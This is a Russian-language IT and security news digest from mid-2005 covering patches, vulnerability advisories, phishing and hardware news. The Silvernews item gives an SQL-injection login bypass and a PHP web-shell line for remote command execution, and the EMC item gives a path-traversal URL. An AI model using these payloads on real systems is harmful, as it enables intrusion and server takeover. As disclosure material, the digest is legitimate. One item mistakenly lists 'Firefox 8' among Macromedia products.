Корпорация Microsoft сдержало свое обещание и выпустило, обещанные на сегодня обновления, закрывающии достаточно серьезные уязвимости в ОС MS Windows 2000/XP, кроме этого был выпущено августовское кумулятивное обновление для Internet Explorer, а также новая версия Malicious Software Removal Tool, средства для проверки и лечения наиболее распространенных вредоносных программ. Все обновления доступны на сайте автоматического обновления продуктов Microsoft.
Microsoft

9/08/2005 17:57 Не критическая уязвимость в Invision Power Board
По сообщению Secunia, некий V[i]RuS обнаружил уязвимость в форумах Invision Power Board 1.0.3/2.0.4 (и возможно других версиях). Уязвимость заключается в возможности присоединять HTML и TXT файлы к соообщениям форума, которые содержат скрипты JavaScript. При открытии таких файлов в браузере, на компьютере пользователя происходит отображение страницы и соответственно выполнение скриптов JavaScript. Для решения этой проблемы, рекомендуется запретить прикрепление HTML и TXT файлов к сообщению форума.
Secunia

9/08/2005 16:50 RecoverPC - "железное" средство борьбы с программными сбоями
Практически все пользователи ОС MS Windows сталкиваются с проблемами, приводящими к сбоям программного обеспечения и самой ОС. Чаще всего, причиной таких сбоев являются компьютерные вирусы, баг-фиксы, которые не редко сами содержат большое количество ошибок, а также ошибки в программах и драйверах устройств, приводящие к порче системных файлов и реестра ОС, что зачастую приводит к отказу загрузки ОС и выдачи "синего экрана смерти". Решению всех этих проблем посвятила себя английская компания Halcyonics, в результате чего представила пользователям свою разработку - RecoverPC. RecoverPC представляет собой 32х битную PCI карту расширения, в которой сохраняются все необходимые системные области: файлы, реестр и даже загрузочная область системного жесткого диска. Для осуществления восстановления системы, после сбоя, достаточно просто загрузить программу восстановления, расположенную на RecoverPC и работающую как надстройка BIOS, и произвести все необходимые операции по восстановлению информации. По заявлению разработчиков, процесс восстановления данных намного быстрее и удобнее, чем при использовании специализированных утилит подобных Ghost. RecoverPC обладает высокой степенью защиты , которая не позволяет получить доступ к хранимой на нем информации, различным программам, в том числе и работающих на "низком" уровне с аппартными средствами. Данный программно-аппаратный комплекс может применяться как в офисах и интернет-кафе, так и дома, чтобы обеспечить защиту ОС от сбоев и сэкономить деньги и нервы при обращении к компьютерным специалистам.
Halcyonics

9/08/2005 15:04 Папирус спасет наших потомков от ядерных отходов
Управление по Атомной Энергии Великобритании(UKAEA) начало программу по закрытию 26 ядерных реакторов, с последующим захоранением ядерных отходов в специальные бункеры. Известно, что ядерные отходы очень долго сохраняют свою радиактивность, поэтому в руководстве UKAEA предприняли попытку поиска оптимального решения для сохранения информации об их месте захоранения, для последующих наших потомков. Современные средства хранения информации не долговечны(их долговечность просто еще не прошла проверку временем), а учитывая сегодняшние темпы развития прогресса, способы чтения информации могут измениться коренным образом. Учитывая все это, было принято решение, зафиксировать место захоранения ядерных отходов на папирусе, именно на том папирусе, который применялся в Древнем Египте. Около 12000 листов такого папируса будут обработаны спецальным раствором и помещены в запломбированные медные контейнеры, основная идея состоит в том, чтобы поддерживать окружающую среду подобной той, что присутствовала в гробницах древних египтян.
The Register

9/08/2005 13:45 Служба безопасности ПриватБанка поймала "фишеров"
Используемая ПриватБанком финансовая технология идентификации клиента сводит к минимуму возможность несанкционированного доступа к активам клиента, и все же в течение нескольких месяцев группа Интернет-мошенников пыталась применить приемы фишинга к клиентам ПриватБанка. Мошенники рассылали клиентам письма от имени Службы безопасности системы Приват24 и предлагали пройти авторизацию якобы на сайте системы электронных платежей Приват24, объясняя это необходимой мерой предосторожности, направленной на обеспечение безопасности электронных счетов.
К счастью, большинство клиентов не попалось на удочку мошенников, так как человеку, знакомому с системой электронных платежей Приват24, хорошо известны и принципы ее функционирования, не требующие дополнительных авторизаций, и настоящий адрес сайта - "https://privat24.pbank.com.ua". Мошенники же в своих электронных письмах указывали очень похожий, но все таки отличный от оригинального адрес - "https://privat24-pbank-com". Все же несколько человек приняли письма «фишеров» за чистую монету и действительно "прошли авторизацию" на поддельном сайте.
Благодаря действиям службы безопасности банка переводы с их счетов были вовремя заблокированы, и деньги остались у их хозяев. Выяснив, на каком портале зарегистрирован сайт, сотрудники службы безопасности банка направили в адрес его администрации письмо с просьбой закрыть мошеннический сайт. Еще несколько недель потребовалось для того, чтобы установить личности мошенников. В результате расследования выяснилось, что попытка несанкционированных денежных переводов со счетов клиентов банка через фальшивый сайт системы Приват24 была предпринята группой интернет-мошенников из Луганска, Донецка и Ровно. Никто из клиентов банка не пострадал. В настоящее время преступники задержаны, дело передано в следственные органы. Проверяется их причастность к другим незаконным финансовым операциям.
m3m.ru

9/08/2005 05:10 Microsoft выпустила средство цензурирования документов Word
Компания Microsoft выпустила интересный и довольно необычный плагин для текстового процессора Word 2003. Называется он Word Redaction, а его основная функция заключается в защите конфиденциальной информации от посторонних глаз. Весь секретный текст будет замазан черными полосами как в письмах и газетах военного времени, подвергшихся цензуре. Работает плагин очень просто: после установки в Word появляется новая панель инструментов Redaction. На панели имеются кнопки для пометки фрагментов текста, подлежащих утайке. По завершении разметки нужно нажать кнопку Redact Document, после чего появится окошко, отображающее процесс "замарывания" текста.
Office 2003 Add-in: Word Redaction
По материалам Компьюленты

9/08/2005 04:12 Переполнение буфера MySQL пользовательскими функциями
Уязвимость в СУБД MySQL, позволяющая вызвать переполнение буфера при создание пользовательских функций, обнаруженна в следующих версиях программы: 4.0.25, 4.1.13 и 5.0.7-beta. Обнаруженная уязвимость является следствием недостаточной проверки границ данных, используемых как параметры функцией init_syms().
Общий вид создания пользовательской функции выглядит так:
"CREATE FUNCTION function_name RETURNS type SONAME "library_name""
Пользовательская переменная "function_name" не может быть более 64 символов. При успешной загрузке библиотеки операционной системой, запрос отправлется внутренней функции init_syms(), которая в свою очередь имеет ограниченный объем буфера в 50 байт, в результате чего происходит переполнение буфера. Использование этой уязвимости дает возможность изменить EIP и позволить атакующему записать данные в произвольное место базы данных.
SecurityFocus

9/08/2005 03:13 Некорректная обработка POP3 UID в fetchmail
В почтовом клиенте fetchmail 6.2.5(и более ранних версиях) обнаружена уязвимость, которая заключается в некорректной обработке длинного POP3 UID, в результате чего произойдет переполнение буфера используемого программой, что повлечет возможность исполнения произвольного кода. В версии fetchmail 6.2.5.1 эта уязимость отсутствует, однако в ней обнаружена другая уязвимость, которая позволяет вызвать "отказ от обслуживания (DoS)", связана она с ошибками при обработке неверных ответов сервера, содержащих NULL значения для некоторых параметров UID. Для устранения этих уязвимостей рекомендуется установить более новую версию программы - fetchmail 6.2.5.2.
Описание

8/08/2005 18:40 Уязвимость в Wine 20050725
По сообщению Джавиера Фернандеса-Санжуино Пена (Javier Fernandez-Sanguino Pena) в программе Wine, предназначенной для запуска Windows 9x/NT/2000/XP, Windows 3.x и DOS приложений под Unix платформы, обнаружена уязвимость, которая позволяет локальному пользователю перезаписать произвольные файлы и выполнить программный код с повышенными привилегиями, используя символьные ссылки (symlink attack). Уязвимость найдена при не безопасном создание временного файла "winelauncher.in" в каталоге "/tmp" с определенными параметрами. Этой уязвимости подвержена Wine 20050725 и возможно предыдущии версии.
Secunia

8/08/2005 17:34 Обнаружена уязвимость в EMC Navisphere Manager
EMC Navisphere Manager является программным комплексом для осуществления конфигурирования, управления и оповещения о событиях в одной или нескольких системах Dell/ЕМС. Обнаруженная уязвимость в этой системе, позволяет злоумышленнику удаленно получить доступ на просмотр содержимого произвольных файлов и каталогов. Чтобы получить произвольный файл, используя эту уязвимость достаточно в адресе указать путь к файлу, с использованием относительного пути, например:
"http://[target]/../../../../../../../EMC/NAVISPHERE/common/log/navimon.log"
, для просмотра содержимого каталога, достаточно поставить "." в конце URL, например:
"http://vulnerable/."
Подверженными этой уязвимости оказались EMC Navisphere Manager 6.6/6.5/6.4.1.0/6.4.
iDEFENSE Security

8/08/2005 13:42 Google и Yahoo получают миллиарды долларов просто так
Как показывает исследование, проведенное компанией Majestic Research, посетители Google и Yahoo уделяют поиску очень мало времени: 21% и 2%, соответственно. Гораздо больше люди проводят за чтением почты — например, для Gmail этот показатель составляет 45%.
У Yahoo еще более интересное распределение времени сессий. Поиск на портале Yahoo стал чуть ли не второстепенной услугой — им пользуется только 1 из 50-ти посетителей сайта в каждый момент времени. Для сравнения, 42% времени, проведенного на портале, люди тратят на электронную почту Yahoo Mail, а еще 22% — на электронный коммуникатор Yahoo Messenger.
Несмотря на эту статистику во II кв. 2005 г. корпорация Google заработала $1,38 млрд, из которых 89% принес именно поиск, а компания Yahoo заработала $1,25 млрд — 30% которых составляют поисковые доходы.
Вебпланета

8/08/2005 13:21 Macromedia обновила линейку своих продуктов
Компания Macromedia заявила cегодня о выходе в свет программного комплекса Studio 8, над разработкой которого работала последнии 2 года. Программный комплекс Macromedia Studio является неотъемлемой частью при создании веб-контента для большинства веб-разработчиков профессионалов. В этот программный комплекс вошли следующие программные продукты новой линейки компании: Dreamweaver 8, Flash Professional 8(включающий новый Flash 8 Video Encoder), Fireworks 8, Contribute 3 и FlashPaper 2.
Dreamweaver 8 является средством визуальной разработки веб-сайтов, предоставляющего возможность наглядного создания веб-страниц. В новой версии расширились возможности по работе CSS слоями, благодаря взаимной интеграции продуктов Macromedia, встроить Flash Video в разрабатываемый сайт станет намного проще, особое внимание было уделено созданию блогов и RSS лент, а также других страниц, использующих в своей структуре XML и XSLT разметку.
В Flash 8 Professional улучшились возможности создания высококачественного видео с использлванием нового кодека On2 VP6, появилась новая система обработки шрифтов - FlashType, которая позволит отображать в высоком качестве даже очень мелкии надписи, добавленная поддержка фильтров, облегчит процесс создания сложных элементов оформления, при этом применение фильтров происходит в реальном времени и занимает минимум системных ресурсов.
Firefox 8 не может похвастаться большим количеством обновлений, однако, и он не остался без внимания, благодаря взаимной интеграции продуктов, стало возможным производить экспорт изображения и CSS-кода непосредственно в Dreamweaver, появилась удобная панель управления, на которой размещены наиболее используемые средства редактирования.
Программа Contribute 3 пришла на смену FreeHand, входившему ранее в комплект Macromedia Studio, данный программный продукт поможет сэкономить время и облегчить процесс обновления содержимое любой HTML-страницы, с его помощью даже неопытный пользователь, не знающий языка HTML, может за несколько минут изменить содержание сайта, сохранив его стиль, компоновку и код.
FlashPaper 2 стал результатом сотрудничества двух крупных компаний - Macromedia и Adobe, благодаря этому программному продукту, вы сможете конвертировать готовые к печати файлы в Flash или PDF формат для дальнейшей их публикации.
Macromedia Studio 8

8/08/2005 03:03 Google отказался "закрасить" ядерный реактор
Один из новых популярных сервисов компании Google - Google Earth набирает обороты, и с каждым днем приветсвует на своих страницах все больше и больше людей, жаждущих увидеть свой дом на снимке из космоса в довольно хорошем качестве и приближение. Такая популярность и широкая доступность снимков многих настораживает, так например, по запросу правительства США на карте были закрыты для просмотра - Белый дом и здания Казначейства. Теперь с аналогичной просьбой к руководству Google обратился руководитель Института ядерной науки и техники Австралии, Ян Смит. Он требует запретить, с целью обеспечения безопасности, для просмотра с близкого расстояния такие объекты страны, как ядерный реактор "Lucas Heights", секретную военно-воздушную базу США "Pine Gap" и Дом Парламента в Канберре. Компания Google отвергла его просьбу, сославшись на все имеющиеся разрешения на публикацию всех фото-снимков со спутника, предоставленных ей компанией DigitalGlobe, кроме этого как заявил представитель Google: "Мы понимаем Ваше беспокойство, но предоставляемые нами снимки имеют срок давности 6-18 месяцев с целью обеспечения безопасности, а с помощью размещенных у нас фотографий очень трудно представить действительное положение людей, транспорта и, в конце концов, точные размеры сооружений."
NEWS.com.au

8/08/2005 01:22 Полезность хакеров для компаний-разработчиков ПО
ZDNet Австралия опубликовала интересную статью, написанную руководителем отдела безопасности компании Oracle, Мэри Эн Дэвидсон, в которой рассказывается о взаимоотношениях крупных разработчиков программного обеспечения и сторонних аналитиков, занимающихся исследованиями в области безопасности программного обеспечения. В статье обсуждаются следующие вопросы: на сколько разработчики программного обеспечения могут обойтись без независимых аналитиков, основываясь только на силы собственных исследовательских отделах, какие сроки, требуются на устранение той или иной обнаруженной уязвимости, при обсуждении этого вопроса акцентрируется внимание на том, что большинство ошибок в программном обеспечении можно закрыть в течении 5 минут, но вот на распространение патчей среди пользователей своих продуктов может уйти до нескольких недель, поэтому большинство компаний просит не сразу предавать публичной огласке найденные уязвимости, и отложить это на определенный срок. Интересны рассуждения автора статьи о денежном вознаграждении сторонних аналитиков, что является довольно щепетильным вопросом в этой сфере, чаще всего хакеры не получают никаких денег за обнаруженные и сообщенные компаниям "бреши" в безопасности разрабатываемого ими программного обеспечения, однако при постоянном сотрудничестве с крупными компаниями не редки случаи трудоустройства и взятия в штат сотрудников.
Подробнее

7/08/2005 23:27 Установка и настройка web-сервера nginx
На веб-сайте DreamCatcher.ru опубликована довольно интересная статья "Установка и настройка web-сервера nginx", в этой статье рассматривается процесс установки на ОС NetBSD 2.0.2 и настройки, набирающего популярность веб-сервера nginx. Веб-сервер ngix отличается от аналогов высокой производительностью, не требовательностью к ресурсам и повышенной надежностью в работе. Разработка данного веб-сервера началась еще в 2002 году и уже сейчас его использует ряд крупных проектов, кроме этого он используется на нескольких серверах Рамблера.
Читать

7/08/2005 22:54 Опубликован список ошибок июньского Update Rollup 1 для MS Windows 2000 SP4
Корпорация Microsoft опубликовала на своем веб-сайте список ошибок, которые могут возникать в системе после установки июньского пакета обновлений Update Rollup 1 для ОС MS Windows 2000 SP4. Опубликована информация о следующих ошибках и способах их решения:
- Сообщение об ошибке "Stop 0x000001E" может возникать, при установленном в вашем компьютере старого, не поддерживающего Plug-and-Play ISA, EISA или Micro Channel Architecture (MCA) SCSIВ Microsoft контроллера. В случае если после установки пакета обновлений ваш компьтер выдает ошибку, вам необходимо загрузиться с системного CD и скопировать файл Scsiport.sys из каталога $NtUpdateRollupPackUninstall$ в папку "%systemroot%system32drivers" после чего перезагрузить компьютер.
- Невозможность сохранения файлов непосредственно на дискету из программ Microsoft Office, данная проблема обнаружена в файле Fastfat.sys, для ее устранения необходимо скопировать этот файл из каталога $NtUpdateRollupPackUninstall$ в папку "%SystemRoot%system32drivers".
- Возможно возникновение ошибок при обращении к программам Citrix MetaFrame XP Server и Citrix MetaFrame Presentation Server 3.0-based, для устранения проблем в работе, рекомендуется обновить версии программ при помощи патчей, которые можно скачать с веб-сайта компании Citrix.
- Сбой в работе Sophos Anti-Virus 5ой версии, заключающийся в 15 минутной паузе при подключении к сети и зависании сообщения "preparing network connections", для устранения этой проблемы, необходимо установить выпущенное компанией Sophos обновление, которое можно загрузить с веб-сайта компании.
- Программа Internet Security Systems может не запуститься после установки этого пакета обновления, для устранения проблемы, компания Microsoft уже выпустила патч, доступный на веб-сайте компании.
Кроме перечисленных выше проблем могут возникнуть проблемы с установленными динамическими дисками, связанные с некорректной работой Mountmgr.sys, нарушение работы Exchange 5.5 (MTA) с использованием X.400. Компания Microsoft работает над устранением обнаруженных ошибок, но точная дата выпуска hotfix'ов пока не известна.
Microsoft

7/08/2005 02:12 "Умное" одеяло подарит вам 15 минут глубокого сна и бодрость пробуждения
Специалисты компании Sanyo Electric создали электрическое одеяло, способное поддерживать комфортную для спящего человека температуру. В основе новинки лежит необычная технология термо-контроля, обеспечивающая регулировку температуры, напрямую влияющую на сон. Например, вначале одеяло нагревается до 34 градусов по Цельсию, затем охлаждается до 30°C и непосредственно перед пробуждением спящего опять становится теплее. По словам компании, такой механизм помогает человеку быстро и крепко заснуть, а проснуться свежим и бодрым.
Проведенные тесты в Научно-исследовательском центре спорта и отдыха при Рицумейканском университете доказали положительное влияние одеяла на сон человека: при тестировании одеяла, люди, которым при обычных условиях приходилось затрачивать на засыпание 30-40 минут, под этим одеялом засыпали в течении 15-25 минут. Дополнительные и более глубокие исследования протекания сна показали, что человек под таким одеялом спит более глубоким сном, чем при обычных условиях. В продажу "умное" одеяло поступит уже в сентябре этого года, предположительная стоимость составит около 150-200$.
По материалам Ferra.ru

6/08/2005 15:05 HP портирует Virus Throttler на Linux платформы
На следующей неделе компания Hewlett-Packard планирует выпустить версию Virus Throttler и ProLiant Essentials Intelligent Networking Pack для Linux платформ. Напомним, что Virus Throttler появился для ОС MS Windows еще в начале прошлого года, данный антивирус используется для обнаружения вирусной активности на компьютерах локальной сети, оповещения об этой активности системного администратора и автоматического уменьшения количества сетевых соединений зараженного компьютера, с целью уменьшения засорения пространства локальной сети. Intelligent Networking Pack представляет собой комплект программных продуктов, предназначенных для серверов ProLiant и BladeSystem, это программное обеспечение позволяет улучшить работоспособность и увеличить производительность локальной сети. Цена комплекта ProLiant Essentials Intelligent Networking Pack составит $149, а Virus Throttler - $90, цены указаны из расчета стоимости лицензии на один сервер. Данное программное обеспечение может применяться на операционных системах Red Hat Linux, Suse Linux и Asianux.
InfoWorld

6/08/2005 02:18 Множественные уязвимости в Lantronix SecureLinx Console Server
Обнаружен ряд уязвимостей в прошивках консольного сервера SecureLinx компании Lantronix. Первая уязвимость позволяет злоумышленнику удаленно или локально получить доступ к конфеденциальной информации сервера, такой как SSH-ключи (/etc/ssh) и журналы работ(/cifsshare/logs/). Уязвимость заключается в отсутствии проверки локальных хостов в UNIX ACL. Этой уязвимости подвержены все модели SLC (SLC8, 16, 32, 48) и SLC32 с программным обеспечение версии 2.0/3.0. Для закрытия уязвимости необходимо установить новую прошивку с веб-сайта производителя версии 3.1. Вторая уязвимость была обнаружена в серверах серии SCS820/1620. Эта уязвимость имеет локальных характер и заключается в небезопасных разрешениях на файлы (/tmp) и канал доступа, возможности повышения привелигий, использование обратного пути в каталогах, переполнение буфера.
Эксплоит

6/08/2005 00:13 Уязвимость в zlib 1.2.2/1.2.1
Найденная уязвимость позволяет злоумышленнику удаленно вызвать переполнение буфера, что приводит к возможности выполнить произвольный программный код на системе с привилегиями активного пользователя. Уязвимость найдена в функции "inflate_table" файла "inftrees.c", заключается она в некорректной обработке специально сформированного ошибочного архива. Библиотека zlib 1.2.3 уже не содержит данной уязвимости.
Secunia

5/08/2005 23:03 Органическии батареи - недалекое будущее ИБП
Японская компания NEC сообщила об окончании разработки высоко-мощной органической батареи или ORB (Organic Radical Battery), предназначенной для настольных компьютеров, с целью обеспечения защиты от сбоев в сети электроснабжения. Благодаря своему небольшому размеру данная батарея может встраиваться непосредственно в блок-питания компьютера. Кроме этого разботчики ORB, предполагают возможность использования этой батареи в бытовых электроприборах. Проведенное тестирование ORB показывает, что такая батарея может обеспечить электропитание компьютера со средней мощностью 100Вт при весе всего в 88 грамм. Разработанная батарея является экологически чистой, не горючей и не взрывоопасной, в отличие от применяемых сейчас. Компания NEC не указывает точной даты начала продаж этой батареи и устройств на ее основе, но заявила, что применение таких батарей "уже не за горами".
BetaNews

5/08/2005 22:19 Выход FreeBSD 6.0 beta 2
Вышла вторая бета-версия популярной ОС FreeBSD 6.0. ISO-образ этой ОС уже доступен для загрузки с FTP разработчиков. Список изменений, внесенных в эту сборку, пока не обнаружен.
Загрузить
Анонс

5/08/2005 20:25 Apple планирует привязать ОС OSX к "железу"
После того, как компания Apple признала свое аппаратное обеспечение не способным оказать конкуренцию современному прогрессу, она заключила контракт с компанией Intel с целью создания новых компьютеров Intel-Apple PC. Несмотря на этот шаг, Apple пытается выделить свои брэндовые компьютеры из прочих, построенных на базе процессоров Intel, для этого было принято решение портировать операционную систему OSX на новое оборудование и создать некую привязку этой операционной системы к используемым аппаратным средствам. Для этого компания Apple собирается применять уже давно известный аппаратный модуль защиты "Trusted Platform Module(TPM)". В разработке этого модуля принимали участие такие компании как Microsoft, IBM, Intel, AMD и Hewlett Packard. Чип TPM содержит в себе генератор случайных чисел и обеспечивает RSA-шифрование данных. Генератор случайных чисел используется для создания пар ключей – приватный ключ хранится в памяти чипа, публичный экспортируется "наружу" – в итоге получается основанное на цифровых подписях надежное средство аутентификации программного обеспечения, в данном случае операционной системы. Такие чипы безопасности уже используются на некоторых брэндовых компьютерах компаний IBM и HP, но выполняют несколько другии функции, например хранение зашифрованных паролей.
По материалам MacTime

5/08/2005 18:00 SyncToy - средство синхронизации от Microsoft
Компания Microsoft выпустила первую бета-версию своей новой программы SyncToy, данная утилита расчитана на работу пока только под ОС MS Windows XP. Основное предназначение программы - выполнение копирования/переноса файлов из одной директории в другую с последующей автоматической синхронизацией этих двух папок, существует возможность одновременной работы с несколькими парами папок. Программа отличается от аналогов простым интерфейсом и понятностью настроек, расчитаных на обычных пользователей. Данная утилита может быть использована для синхронизации папок стационарного компьютера с папками на цифровых фото- видео-камерах, мобильных телефонах, портативных музыкальных плеерах, КПК и ноутбуках.
Microsoft SyncToy

5/08/2005 16:01 Анонс предполагаемых обновлений от Microsoft
Сегодня корпорация Microsoft выпустила анонс предполагаемых обновлений на 9 августа. В данном анонсе фигурирует выпуск шести "критических" обновлений безопасности и одного обновления высокой важности, но не касающегося проблем безопасности. Кроме этого в анонсе сказано об обновлении утилиты Malicious Software Removal Tool, предназначенной для обнаружения и удаления наиболее распространенных вирусов. Все обновления будут доступны через сайты автоматического обновления Microsoft.
Microsoft Technet

4/08/2005 21:25 Небезопасное хранение пароля в Trillian
В популярном интернет-пейджере Trillian 3.0/3.1 Pro/Basic обнаружена возможность получения пароля от почтового сервиса Yahoo. Это стало возможным благодаря программной ошибки, которая заключается в следующем: при активации опции проверки почтового ящика Yahoo через Trillian, создается временный файл со случайным именем в папке "<Install Directory>usersdefaultcache", этот файл содержит пароль в чистом виде, после завершения работы программы, файл не удаляется.
SecuriTeam

4/08/2005 17:44 Опасная уязвимость в Silvernews
Обнаружена опасная уязвимость в системе управления новостным контентом Silvernews. Злоумышленник, используя найденную уязвимость, способен получить полный контроль над сервером. Уязвимость позволяет обойти пароль администратора новостной системы, в случае если на сервере в настройках PHP отключен параметр "magic_quotes", для этого злоумышленник может воспользоваться следующим сочетанием логин/пароль: "' or isnull(1/0) /*"/"whatever". При помощи средств администрирования, отредактировать модуль "Global footer", добавив, к примеру, строку PHP-кода "system($HTTP_GET_VARS[command]);", которая позволит удаленно выполнить произвольные команды, указанные параметром "command" в адресе, ссылающимся на скрипт "/templates/tpl_global.php".
Этой уязвимости подвержены Silvernews 2.0.3 и возможно предыдущие версии. Для защиты от этой уязвимости рекомендуется в настройках PHP добавить в файл настроек строчки "disable_functions system, exex" и "magic_quotes_gpc On".
Эксплоит

4/08/2005 16:06 "Бета-вирус" для бета-версии MS Monad Shell
Антивирусная компания F-Secure сообщает об обнаружении первого вируса - "Danom", который ориентирован на новую оболочку с кодовым названием Monad, планируемую для внедрения в ОС MS Windows Vista. Вирус не производит никаких вредоносных действий, кроме саморазмножения и прописывания своего кода в обнаруженные файлы-скрипты .MSH, которые используются в новой оболочке как замена, применяемых сейчас .BAT и .CMD файлов. Поскольку данная оболочка не включена в стандартную комплектацию недавно вышедшей MS Windows Vista Beta 1, то этот вирус пока нельзя назвать первым вирусом под эту ОС.
F-Secure

4/08/2005 14:42 Тотальный контроль Интернета становится возможным, для начала в Китае
Китай - страна, известная всем своими попытками оградить свой народ от пагубного воздействия Интернета, прибегая к таким радикальным мерам, как закрытие публичных Интернет-кафе и изолированию местной зоны Интернета от всего мира с обеих сторон. Неуспела стихнуть волна недовольств международных организаций по защите прав и свобод человека, как Китай подкинул еще один повод для разбирательств. Этим поводом стал арест гражданина Китая некоего Джанг Лина(Zhang Lin), который с начала этого года занимался публикацией и рассылкой в Интернете текстов панк-песен. Суд признал Джанг Лина виновным в том, что он "распространяя ложь, нарушает общественный порядок и устойчивость сложившегося национального суверенитета" и приговорил его к пяти годам тюремного заключения, отклонив все жалобы международных организаций.
Кроме этого руководство Китая подтвердило свое намерение ввести тотальный контроль над посетителями интернет-кафе, дабы обеспечить "здоровье нации".
По материалам The Register

4/08/2005 14:07 EFI замена BIOS в ближайшем будущем
В начале прошлой недели на UEFI форуме, в котором участвуют ведущии производители аппаратного и программного обеспечения, такие как AMD, Dell, HP, Intel, IBM, Insyde Software, Microsoft и Phoenix Technologies, была одобрена спецификация новой системы EFI 1.10, которая должна прийти на смену существующей BIOS(Basic Input/Output System). Правда, новая система не полностью заменит созданную еще в 1980'х годах BIOS, она будет выполнена как надстройка, и состаять из связанных таблиц, в которых будет храниться информация об установленном в компьютере оборудование и скорее всего ряд уникальных индентификаторов, кроме этого новая система не будет привязана к процессорам как ее предшественница, что позволит решить ряд возникающих проблем, связанных с совместимостью процессоров и программного обеспечения на разных платформах. В EFI уже существует полная поддержка как 32-битных платформ, так и 64-битных платформ и операционных систем. Организаторы UEFI форума обещают внедрение в производство этой системы уже к концу 2005 года.
UEFI Forum

4/08/2005 13:47 Red Hat закрывает уязвимости в SquirrelMail
SquirrelMail представляет собой веб-интерфейс для работы c почтой, написанный на PHP4. Сегодня было выпущено обновление, которое закрывает ранее найденные две уязвимости в нем.
Первая уязвимость связана с неправильной обработкой данных, получаемых из переменной $_POST в модуле "options_identities.php". С помощью этой уязвимости любой желающий мог получить доступ к просмотру и изменению настроек пользователя, достаточно было просто зайти на специально модифицированный URL.
Вторая уязвимость позволяла злоумышленнику выполнить произвольный Javascript или HTML код, послав пользователю специально сформированное HTML-письмо или URL.
Всем пользователям SquirrelMail 1.4.0 - 1.4.5-RC1 рекомендуется установить вышедшее обновление.
RHSA-2005:595-12

4/08/2005 13:45 Novell сделает из SUSE Linux open-source
Novell планирует открыть исходные коды своей ОС SUSE Linux для пользователей и разработчиков. Данный проект получил название OpenSUSE и будет представлен на выставке-конференции LinuxWorld, которая пройдет на следующей недели в Сан-Франциско.
"Мы сделаем OpenSUSE доступным везде и для каждого," заявил Greg Mancusi-Ungaro, маркетинговый директор Novell. "Изучив требования наших клиентов, мы поняли, что все еще очень и очень трудно использовать Linux без достаточных технических знаний."
Основной целью открытия open-source проекта, Novell считает, привлечение сторонних разработчиков, которые позволят сделать ОС SUSE Linux более доступной для всех, в том числе и для обычных пользователей. Специально для этого проекта был зарегестрирован домен www.opensuse.org, но пока еще не доступный широкой общественности, по заявлению все того же Greg Mancusi-Ungaro, проект проходит предрелизовую подготовку и отладку, чтобы в близжайшее время стать доступным всем желающим.
Computerworld

4/08/2005 04:05 Google планирует открытие IT-парка на территории России
С целью обсуждения вопросов, связанных с рассмотрением возможности открытия нового IT-парка компании Google в России, между представителями компании Google и заместителем министра Информационных технологий и связи РФ Дмитрием Милованцевем в пятницу была проведена встреча. На встрече обсуждались возможности создания в России IT-парка компании Google на 3000 рабочих мест. Предположительно городом размещения IT-парка компании выбран Санкт-Петербург, но также рассматриваются такие города как Москва, Томск, Новосибирск и Московская область. На реализацию этого проекта Google планирует выделить около 1 миллиарда долларов США, предположительное время запуска проекта - 2008 год.
The Moscow Times

4/08/2005 02:35 Немного о безопасности Bluetooth систем
Компания Trifinite Group, состаящая из энтузиастов, занимающихся изучением безопасности беспроводных систем, представила общественности свою новую разработку под названием "Car Whisperer". Данный программный комплекс работает через Bluetooth и способен подключаться к уже сейчас встраиваемым в автомобили системам громкой связи или carkit'ам, а также к прочим Bluetooth гарнитурам.
Для обнаружения устройства, с которыми может быть установлено соединение используется, постоянно выполняемый модуль под названием "cw_scanner". Как только подходящее устройство будет обнаружено, запускается основной модуль, который создает управляющие соединение через RFCOMM channel 1 и открывает синхронный канал(SCO) связи для передачи данных. Далее в работу вступает скрипт "cw_pin.pl", подменяющий стандартный "Bluez PIN helper" и производящий взлом защиты. Взлом производится следующим образом: скрипт "cw_pin.pl" получает от обнаруженного устройства три первых байта адреса, которые индентифицирует производителя устройства и сравнивают его с имеющимися стандартными кодами доступа, при помощи специального модуля "cw_pin.sh". В большинстве случаях при доступе используются стндартные примитивные коды, такие как "1234" или "0000". После удачного соединения и получения доступа, Car Whisperer позволяет подслушивать и записывать разговоры внутри, попадающих в зону действия комплекса, автомобилей и передавать звуковые сообщения.
Представленный опытный образец при удачном соединении с Bluetooth устройством передает звуковое сообщение: "Hello there. This is the Trifinite Car Whisperer. Drive carefully.".
Разработчики этого программного комплекса рекомендуют не использовать простые и стандартные коды защит, отключать при ненадобности Bluetooth гарнитуры и carkit'ы или подключать к ним хотябы одно устройство.
Car Whisperer

31/07/2005 12:21 В США сократились финансовые потери от хакерских атак
По результатам исследования, проведенного американским Институтом компьютерной безопасности и ФБР, ущерб от атак на корпоративные информационные системы в прошлом году оказался на 61 % меньшим, чем в 2003 году. Средний ущерб от атак в 2004 году составлял $204 тыс., в то время как в 2003 году – $526 тыс. Прошлый год стал уже четвертым подряд, когда среднестатистический ущерб от хакерских вторжений уменьшается. На этом основании исследователи сделали вывод, что корпоративные системы с каждым годом становятся более защищенными. Несмотря на повышение уровня безопасности корпоративных сетей, стоимость похищенной информации в 2004 году, напротив, возросла. Если в 2003 году она составляла в среднем $51 тыс., то в прошлом году – уже $300 тыс.
Источник

31/07/2005 11:57 Житель Мэриленда осужден за модификацию Xbox
На этой неделе житель штата Мэриленд получил срок за продажу модифицированных приставок Xbox, сообщает CNET News. Тридцатиоднолетний Хитеш Пател, сотрудник сети магазинов Pandora's Cube, оснащал игровые консоли модчипами, которые позволяют использовать пиратские копии игр. В Pandora's Cube также продавались модифицированные Xbox с предустановленными пиратскими играми. Незаконным усовершенствованием приставок Пател занимался совместно с группой коллег, куда входил и сам владелец торговой сети Бирен Амин. Пател признал себя виновным. Окружной суд Мэриленда постановил, что своими действиями обвиняемый нарушил Закон об авторских правах в цифровую эпоху (Digital Millennium Copyright Act - DMCA), и приговорил моддера к четырем месяцам тюремного заключения. Амин был также осужден за нарушение копирайта, приговор ему будет вынесен в ближайшие несколько недель. Прокомментировать ситуацию владелец магазинов Pandora's Cube отказался. Жалоба о том, что сеть Pandora's Cube нарушает авторские права поступило от Ассоциации производителей развлекательного ПО в американское Бюро иммиграции и в управление таможенного правоприменения США. Следствие было начато в декабре прошлого года и продлилось месяц. Рик Хирш, представляющий Ассоциацию производителей развлекательного ПО, заявил, что Pandora's Cube - не единственная торговая сеть, через которую реализуются модифицированные приставки. Нелегальными продажами занимаются на территории США множество магазинов, однако большинство из них ведут свою деятельность гораздо более скрытно, чем Pandora's Cube. По словам Хирша, уголовное наказание Хитеша Патела может заставить призадуматься остальных моддеров и прекратить нарушать копирайт.
